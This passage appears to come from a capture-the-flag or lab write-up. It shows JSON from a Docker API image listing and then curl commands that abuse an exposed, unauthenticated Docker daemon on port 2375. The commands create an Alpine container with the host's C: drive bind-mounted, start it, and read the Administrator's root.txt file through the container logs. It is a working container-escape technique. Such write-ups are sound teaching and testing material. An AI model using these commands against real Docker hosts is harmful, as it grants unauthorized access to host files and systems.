Community","org.opencontainers.image.version":"11.4.8"},"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40","size":856},"RepoDigests":["docker_setup-mariadb@sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40"],"RepoTags":["docker_setup-mariadb:latest"],"SharedSize":-1,"Size":454269972},{"Containers":0,"Created":1759921496,"Id":"sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412","Labels":null,"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412","size":9218},"RepoDigests":["alpine@sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412"],"RepoTags":["alpine:latest"],"SharedSize":-1,"Size":12794775}]
## Let's leverage this alpine image
# Create and start a container with the host's C: drive bind-mounted
# usually on WSL, the C drive appears as /mnt/host/c
curl -X POST http://192.168.65.7:2375/containers/create \
-H "Content-Type: application/json" \
-d '{
"Image": "alpine:latest",
"Cmd": ["/bin/sh", "-c", "cat /win/Users/Administrator/Desktop/root.txt"],
"HostConfig": {
"Binds": ["/mnt/host/c:/win"]
}
}'
curl -X POST http://192.168.65.7:2375/containers/07432e6810237d8a8077f3a40e48f61ceb6e8748fada6d9c3a83d58a5e962f18/start
curl "http://192.168.65.7:2375/containers/07432e6810237d8a8077f3a40e48f61ceb6e8748fada6d9c3a83d58a5e962f18/logs?stdout=1&stderr=1"